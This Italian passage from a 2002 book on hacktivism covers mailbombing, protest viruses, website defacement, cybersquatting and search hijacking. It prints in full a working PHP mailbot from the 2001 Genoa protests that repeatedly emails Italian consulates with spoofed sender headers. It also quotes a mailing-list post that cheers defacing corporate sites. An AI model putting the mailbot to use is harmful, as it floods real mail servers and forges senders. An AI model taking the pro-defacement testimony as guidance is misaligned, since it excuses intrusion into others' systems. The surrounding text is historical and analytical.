del mittente) a partire da un sito web del genere (estremamente semplice
da utilizzare).
Mailbombing Anche il mailbombing
può essere considerato un attacco fisico se ne consideriamo soltanto
gli effetti. Ingenti quantità di lettere elettroniche recanti corposi
attachment-files possono infatti ottenere l’effetto di intasare e
bloccare i mail servers. Il mailbombing
è diverso dal mass-mailing, ma la distinzione tra i due non è netta,
a meno che non si introduca il concetto di automazione della protesta
e del carattere individuale di essa. Siccome il mass mailing in genere
viene fatto da molte persone contemporaneamente, la capacità di intasare
i server è proporzionale alla quantità di banda disponibile, al numero
di partecipanti e al tempo che ciascuno gli dedica, e difficilmente
produce un blocco delle attività del bersaglio, mentre il mailbombing
in genere viene effettuato attraverso dei software che automatizzano
la procedura della spedizione, si appoggiano a dei computer zombies
e con un solo clic permettono di spedire centinaia o migliaia di mail,
in forma anonima se transitano attraverso un sito sicuro, spesso riportando
le indicazioni di un mittente credibile, ma che non l’ha mai spedita,
in modo da indurre attenzione per la email. Proprio come
è accaduto dopo l’omicidio di Carlo Giuliani durante le proteste anti-G8. Ecco di seguito
la trascrizione del programma di mailing automatico e l’indicazione
del sito (abbiamo tralasciato il lungo elenco di indirizzi target
per motivi di spazio, ma esso è stato distribuito contemporaneamente
alla diffusione della URL della protesta.). In sintesi:
collegandosi al sito dove risiedeva il «mailbot» (mailing robot),
si potevano «sparare» ripetutamente e con un solo click, le e-mail
di protesta che chiedevano le dimisssioni del «governo fascista italiano». Dal sito www.italy.indymedia.org
Protesta automatica
email by ... 2:41am
Mon Jul 23 ‘01 (Modified on 10:04am Mon Jul 23 ‘01)
Come spedire
mail di protesta verso tutti i consolati italiani... (cliccare sul
link, è automatico ed anonimo, in html, spedisce una email ogni cinque
secondi) – da indymedia france.
———— begin
mailbot.php ————
<?/* this is a
php mailbot targeted at italian embassies and consulates the file «mailbot.txt»
has to be installed in the same directory please install,
modify, publish and distribute this bot widely its original
url is: http://excess4all.com/genoa/mailbot.php if you like
check for e-mail addresses that produce errors */ $seconds_per_turn
= 15; $mails_per_turn
= 15; $to = «»; $subject =
«re: Genoa»; $body = «During
the G8 Summit in Genoa, Italian Paramilitary Police has killed Carlo Giuliani,
seriously injured hundreds of other activists and brutally raided the
Genoa Independent Media Center and the Genoa Social Forum.\n I demand that
the Fascist Italian Government resigns immediately!»;
srand(time()); $mail = file(«mailbot.txt»); for ($i =
0; $i < count($mail); $i++) { $mail[$i]
= chop($mail[$i]); $random[$i]
= rand() / getrandmax(); }
asort($random); $j = 0; while (list($i,
$v) = each($random)) { if ($j ==
0) $headers .=
«From: {$mail[$i]}\nReply-To: {$mail[$i]}\nErrors-To: {$mail[$i]}\nX-Complaints-To:
{$mail[$i]}\nBcc: «; else if ($j
<= $mails_per_turn) { $headers .=
$mail[$i]; if ($j <
$mails_per_turn) $headers .=
«, «; } else break; $j++; }
$sent = mail($to,
$subject, $body, $headers);
echo «<meta
http-equiv=\»refresh\» content=\»{$seconds_per_turn}; URL=mailbot.php\»>»; echo «<title>mailbot</title><body
bgcolor=black text=white><tt>»;
if ($sent
== true) echo «mail
has been sent»; else echo «error»; echo « (next
mail in {$seconds_per_turn} seconds)<br><br>{$subject}<br><br>{$body}<br><br>{$headers}»;
?> ———— end mailbot.php
————
Virus Creativi La scrittura
e la diffusione di virus informatici è un tipo di azione che condivide
una doppia natura in quanto i virus possono intasare le reti e danneggiare
computer e periferiche oppure possono veicolare messaggi e slogan
«innocui». Potrebbero essere considerati appartenenti a tutte e tre
le categorie di attacchi: fisici, perché possono bloccare e danneggiare
computer e reti, sintattici, perché modificano il funzionamento di
un altro software e spesso lo «reinterpretano», semantici, perché
veicolano un messaggio inatteso.
Ma come funzionano
i virus? I virus informatici
attaccano i computer proprio come fanno quelli biologici che attaccano
organismi viventi. Cambia il veicolo del contagio ma i meccanismi
sono gli stessi. Come un virus biologico si insinua nelle cellule,
quello informatico si insinua nei programmi del computer, spesso nel
sistema di gestione dei files, quasi sempre dei sistemi operativi
Windows. Le ragioni
e le strategie usate sono assai diverse: i virus che bloccano computer,
infrastrutture e nodi di comunicazione di singoli utenti o di aziende
nascono dai motivi più diversi: sfida, ritorsione, propaganda, concorrenza
industriale. I virus distruttivi
che per l’appunto implicano la distruzione dei file dell’avversario
sono quelli della Assassin Strategy. Diversa è la strategia di duplicare
all’infinito il virus con l’obiettivo di intasare il sistema avvversario
bloccandone le attività. La cosiddetta Overload Strategy. Un particolare
tipo di virus è il worm (verme) inviato come attachment.. In genere
il modo in cui funzionano i worms è tale che quando si apre l’attachment
il worm si autoinvia a tutti gli indirizzi dell’address book, distrugge
gli antivirus e i firewall software, e installa una back-door che
può permettere future azioni di break-in. Fra gli ultimi e più pericolosi
con queste caratteristiche conosciamo il Goner. I virus più
efficaci comunque sono quelli che non vengono scoperti e che non vanno
ad infettare tutti i computer ma postazioni singole, spesso per poterle
controllare da remoto e continuare ad attingere informazioni nello
stesso computer per molto tempo, almeno finché non ne viene scoperta
l’esistenza. Lo spionaggio industriale adopera spesso la Probe strategy
per scippare le informazioni dai computer dell’avversario. Un particolare
tipo di virus sono i cosidetti «troiani», per allusione al mitico
cavallo di Troia e al suo indesiderato carico di Achei. In fondo fanno
lo stesso: entrano di nascosto in un posto, spesso ben difeso, e aprono
le porte precedentemente sbarrate all’intrusore. È la Trojan horse
strategy e serve a prendere il controllo del computer avversario. Ultima ma
non meno importante è la Forced Quarantine Strategy: l’annuncio di
una potenziale infezione obbliga l’avversario alla difesa impegnandone
le risorse. È la più frequente nelle battaglie commerciali. Le guerre
commerciali al tempo di Internet si fanno pure così. È come il gioco
di guardie e ladri. Più furbi si fanno i primi, meglio preparati devono
essere i secondi. Essere preparati significa impiegare risorse umane
ed economiche, e tutto ciò contribuisce a far crescere l’enorme industria
della sicurezza informatica. Ma da dove
arrivano i virus, qual è il veicolo del contagio? In genere arrivano
attraverso i programmi di posta come Microsoft Outlook, Icq instant
messaging, e gli Internet Relay Chat, spesso mascherandosi da screen
saver o aggiornamenti di software. Ma in alcuni casi provengono addirittura
dai siti di softwarehouse commerciali da cui si scaricano gli upgrade
di software precedentemente acquistati. I virus però
sono usati anche come metodo di lotta politica e non sono soltanto
il passatempo di quei giovani smanettoni che in maniera un po’ sprezzante
vengono definiti «script kiddies», che utilizzano righe di codice
informatico scritte da altri per automatizzare le procedure di interazione
con i file e le macchine informatiche spesso con scopi diversi da
quelli dei creatori originari. Anche in questo
caso le motivazioni della diffusione di virus sono assai differenti.
C’è chi diffonde virus per colpire i responsabili di atti considerati
criminali e chi lo fa per obbligarti ad ascoltarlo. I virus sono insomma
un mezzo di comunicazione e non solo uno strumento di offesa. Per questo,
insieme ai virus maligni, dobbiamo ricodare che ce ne sono anche di
«innocui». A quest’ultima categoria appartiene un piccolo virus shockwave
che ha fatto molto parlare di sé. «Dà dell’idiota a chi lo apre, modifica
una serie di file e suggerisce all’utente Windows di passare a Linux.
Il worm che sta girando come attachment spacciandosi per file shockwave
avrebbe potuto essere molto più pericoloso». 41 Motivazioni
diverse sono quelle della creazione di un virus con linguaggio «python»
da parte di un gruppo di artisti/programmatori e programmatori/artisti
italiani che rispondono al nome di «epidemiC». Gli artisti ritengono
che la scrittura del codice sorgente, ossia di quel testo che dispone
e programma la esecutività di un virus, sia da considerare come un
prodotto estetico. Essi ritengono che il virus sia «arte e che, in
quanto arte nativa e originaria del web, ossia di quel complesso spazio/fenomeno
(condominio di massa) che viene chiamato “rete”, abbia tutte le caratteristiche
per presentarsi come un’avanguardia assolutamente originale, rivoluzionaria
e portatrice di innovatività sia sul piano della generazione di nuovi
modelli linguistici, psicologici, biologici e comunicazionali, che
sul piano più strettamente estetico» http://ready-made.net/epidemic
Insomma, niente
a che vedere con i virus Lovebug o con Code Red? Non proprio. Lovebug
è stato creato da un giovane filippino proveniente da una scuola d’eccellenza
del suo paese (il Computer College di Manila) per consentire a chiunque
di potersi collegare alla rete senza pagare la tariffa telefonica.
Un atto gridato di protesta in un paese dove un’ora di connessione
in un Internet café costa la metà di uno stipendio medio. Probabilmente
il significato etico di un’azione del genere sfugge a chi non condivide
l’idea dell’accesso libero e illimitato all’informazione, ma certo
lo studente non era un criminale, dato che aveva scritto il programma
per la tesi di laurea che in quanto tale era pubblica. Code Red,
invece, era stato pensato affinché centinaia di computer facessero
contemporaneamente delle richieste di collegamento al server della
Casa Bianca in modo da determinare l’intasamento di banda e da metterlo
fuori servizio causando un D-Dos, Distributed Denial of service. Il
nome stesso del virus era allusivo degli obiettivi. La voce della
rete dice che sia stato realizzato per protestare contro la politica
estera americana come parte di una generale campagna di sostegno al
popolo palestinese e contro il veto che gli Usa al Consiglio di sicurezza
dell’Onu hanno posto alle risoluzioni contro Israele, ma i motivi
effettivi della sua diffusione rimangono ancora ignoti.
Defacement Anche i defacements
sono delle pratiche-limite di contestazione elettronica. I defacements
consistono nello stravolgimento delle homepage del sito web del target
con l’immissione di contenuti irridenti e critici, a volte nonsense
(o apparentemente tali). Il termine defacement può essere correttamente
tradotto in italiano come «defacciamento», ma c’è chi sostiene che
il termine più adatto sia «rifacimento» o «rifacciamento» dal gioco
delle parole inglesi «de-facement» e «re-facement». I defacements
sono considerati una pratica illegale, ma è difficile considerarli
alla stregua di un attacco fisico perché, seppur mirati a interferire
con le attività di comunicazione del target, non provocano danni permanenti
e non sono rivolti al furto di informazioni o materiali riservati,
quanto piuttosto a occupare temporaneamente uno spazio di comunicazione. È stato notato
che il linguaggio irridente usato dai defacers è lo stesso dei rappers,
i poeti di strada dei ghetti americani, e che, come loro, i defacers
si considerano antagonisti oppressi del discorso pubblico egemone,
e che per questo il defacciamento dei siti web andrebbe paragonato
al graffitismo delle gang e della cultura hip-hop. Il «rifacimento»
dei siti andrebbe messo in relazione ad una filosofia che connette
arte, artisti, e movimenti di resistenza, in quanto rinvia a un’attitudine
comunicativa precedente lo sviluppo commerciale di Internet, a quando
essa era luogo di discussione e di scambio di informazioni e i forum
degli hackers erano la porta d’ingresso a circoli esclusivi. Probabilmente
non è sbagliato considerare i defacements come il modo in cui le comunità
«autoctone» della rete riaffermano la loro esistenza di comunità occupando
spazi altrui come espressione di resistenza contro l’Internet delle
multinazionali e dei governi se consideriamo la seguente testimonianza:
Defacement:
Una testimonianza dalla mailing list cyber-rights@ecn.org
[...]per me
il defacing è una pratica «normale» (magari con qualche rivendicazione
politica che forse ha anche più senso il tutto), allora il defacing
sui siti di multinazionali, e non, che contribuiscono, in qualunque
forma, allo sfruttamento e sottomissione di interi popoli e/o nazioni,
che speculano sulla salute degli esseri umani (vedi Aids in Africa),
e tutte quelle belle cosine figlie del capitalismo e del neoliberismo,
risulta essere una pratica di dissenso e di contrapposizione come
un’altra, specie se non si fanno danni al server, ma il tutto si limita
a cambiargli l’home page per avere visibilità e per rivendicare una
propria ideologia, se esistono sistemisti che di sicurezza non ne
sanno un cazzo, allora dopo una cosa del genere cominceranno a essere
«paranoici» e in qualche modo abbiamo contribuito a spargere dubbie
incertezze sulle loro «false sicurezze e certezze» informatiche e
non... Quindi chi
fa defacing non è un vandalo se non distrugge il sistema, ma si limita
a usare il Web come uno spazio dove poter esprimersi, anche con un
atto forte come il defacing (mi piace l’idea dell’attakkinaggio nel
Web). L’azienda o le aziende subiscono un danno? E chi se ne frega,
quanti danni fanno le aziende, nel nome del profitto, nel mondo? Attakkinaggio
abusivo e scritte sui muri con le bombolette... sempre esistiti in
politica, fin dai tempi degli antichi romani. È che è difficile,
anche per i più algidi osservatori delle umane questioni, non mettere
in relazione la passione che spinge a bucare un sito con l’ansia di
spazi liberi da filtri e da censure per dire la propria opinione,
qualunque essa sia, fosse anche l’ultima delle cretinate. Se c’è un
momento storico per tifare per un ritorno in grande stile degli hacker
è questo, ma non per protestare contro il G8, protesta già in copertina.
Bucare un sito e pubblicare una propria pagina ovunque lo si voglia
è un modo più efficace di tanti altri per ribadire che non servono
leggi, non servono regolamenti, non servono sequestri di siti. A molti
il comportamento degli hacker può non piacere: per ridimensionarne
la necessità può bastare garantire in tutto il mondo il pieno diritto
all’espressione del proprio pensiero, qualunque esso sia…
In quanto
comunità «residenti» della rete i defacers hanno dei luoghi di ritrovo,
e questi in genere coincidono con i siti web che ne archiviano le
«imprese». Essi sono innanzitutto www.2600.org, www.attrition.org
e il suo defacement mirror, e www.alldas.de, luoghi risiedere nei
quali implica l’impegno comune all’etica hacker e la convinzione che
l’informazione, in tutte le forme, deve essere libera. Questa pratica
comunitaria ha un effetto ulteriore: le azioni dei «defacers» aggirano
i classici sentieri di conoscenza del web – i corporate «search engines»
come google e yahoo – causando in genere una vasta eco nel mediascape.
Infatti i
gruppi che praticano il defacement in questo modo conquistano visibilità
e fanno notizia sul web. Per questo
il defacciamento è da considerare un modo di comunicare con l’interno,
la comunità più vasta degli hackers/defacers, e con l’esterno, il
general public. Il sapere
di Internet è così riconfigurato dall’informazione inserita attraverso
i defacements.
Se c’è da
fare un’osservazione forse questa è quella per cui i graffiti si fanno
per strada, non dentro le case della gente. In quei luoghi cioè che
si riconoscono come luoghi pubblici e dunque luoghi il cui apparire
dovrebbe essere il risultato dell’espressione degli individui che
appartengono alla comunità di cui le strade sono il luogo. Analogamente
si dovrebbe forse definire cosa in Internet equivale alle strade nella
realtà urbana. Sicuramente in Internet la comunità è globale. Presumibilmente
strade possono essere considerate tutti i portali, le home page intese
come vetrine e ogni lista di link, in quanto ogni mappa in Internet
è allo stesso tempo strada da percorrere per arrivare in un luogo
e dunque dovrebbe essere considerata uno spazio pubblico. Così come
le strade urbane non dovrebbero essere solo piene delle pubblicità
di chi ha i soldi per pagarle, ma essere lavagne pubbliche in continuo
mutamento, analogamente determinati luoghi in Internet dovrebbero
avere un’analoga funzione. La comunicazione è una delle principali
risorse dell’umanità. Per quale motivo le lobbies della pubblicità
devono detenere il monopolio sugli spazi pubblici, reali e virtuali,
delegati a comunicare informazioni? Per quale motivo i principali
crocevia e portali di Internet devono essere gestiti da privati anziché
essere il risultato di una politica comunitaria. Laddove la politica
non riesce, o non vuole risolvere una situazione che provoca divario
sociale, esisteranno sempre risposte sociali che si riapproprieranno
con forme più o meno legali dei diritti che gli vengono negati.
Cybersquatting Il cybersquatting
è l’utilizzo del nome di dominio (l’indirizzo Internet), da parte
di un soggetto non legittimato ad usarlo. Inizialmente il termine
è stato usato per indicare la pratica del domain grabbing (appropriazione
di dominio), che consiste nell’acquistare un certo nome di dominio
per rivenderlo e farne commercio. Successivamente il concetto è stato
esteso alla pratica di acquisizione di un dominio orientata a creare
confusione o disturbo ad altri soggetti in quanto indicazione ingannevole
dell’ubicazione Internet di certi contenuti. L’argomento è assai controverso
(tanto è vero che esistono istituzioni che si occupano di risolvere
conflitti ad esso legati) ma anche in Italia esiste una legislazione
specifica che lo regola. Il motivo? Proprio il valore economico che
la denominazione dei siti rappresenta in quanto veicolo di contatto
col pubblico e elemento dell’immagine dei soggetti interessati, siano
essi privati o aziende. Se però è
consuetudine che la soluzione extragiudiziale e arbitrale delle controversie
derivanti dal cybersquatting tenga conto della «buona fede» di chi
si «appropria» di un nome non suo, come pure della non esclusività
d’uso di un certo dominio, l’«appropriazione» di un nome di dominio
è in genere considerata «illegittima» quando è accompagnata dal plagio
dei contenuti del depositario legale del nome di dominio. Ed è questa
la pratica che ci interessa. La strategia
dei cybersquatters/plagiaristi è appena diversa: si registra un nome
di dominio che ripete oppure evoca il nome del bersaglio e lo si riempie
con contenuti diversi da quelli che ci si aspetterebbe di trovare
all’indirizzo digitato. I cyberattivisti
di ®TMark (si pronuncia Art-mark) a questo proposito hanno accumulato
una grossa esperienza ma sono stati emulati molto bene anche dagli
italiani. Nel Novembre
1999 ®TMark pubblica http://rtmark.com/ gatt.html un sito contente
informazioni sul meeting di Seattle del 30 Novembre. Il sito, formalmente
identico a quello ufficiale dell’organizzazione per il commercio,
a dispetto delle aspettative dei visitatori mette in discussione gli
assunti del libero mercato e della globalizzazione economica. Nel Febbraio
2001, invece, in occasione del Terzo Global Forum, quello sul Governo
Elettronico tenutosi a Napoli in Marzo, alcuni attivisti napoletani
clonano il sito della manifestazione ufficiale, ne modificano i contenuti
e lo riversano su un loro dominio ocse.org che, successivamente censurato,
viene trasferito su www.noglobal.org/ocse. Anche in questo
caso il sito plagiato dagli antiglobalizzatori conteneva una critica
radicale al Forum che, secondo loro, era volto «a definire nuove modalità
di sfruttamento e controllo sociale attraverso l’informatizzazione
degli stati», anziché a promuoverne lo sviluppo democratico.
Digital hijacking Il cybersquatting
«funziona meglio» quando viene associato a tecniche di digital hijacking
www.hijack.org. Il digital hijacking è la pratica del dirottamento
digitale e, nella sua accezione più forte, può essere interpretato
come il rapimento virtuale di un utilizzatore di motori di ricerca
il quale, digitando la sua query (interrogazione), attraverso delle
parole chiave significative o rappresentative dei documenti che cerca,
viene catapultato verso una dummy page (pagina fantoccio) con contenuti
diversi da quelli indicati dall’indexing del motore, e difformi rispetto
a quelli attesi. In questo
caso è difficile distinguere gli attacchi sintattici da quelli semantici,
anzi potremmo dire che essi sono complementari.
|
||
|
||
Licenza: Questo testo e' soggetto alla GNU Free Documentation License Copyright (c) 2002 A. Di Corinto, T.Tozzi
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.1 |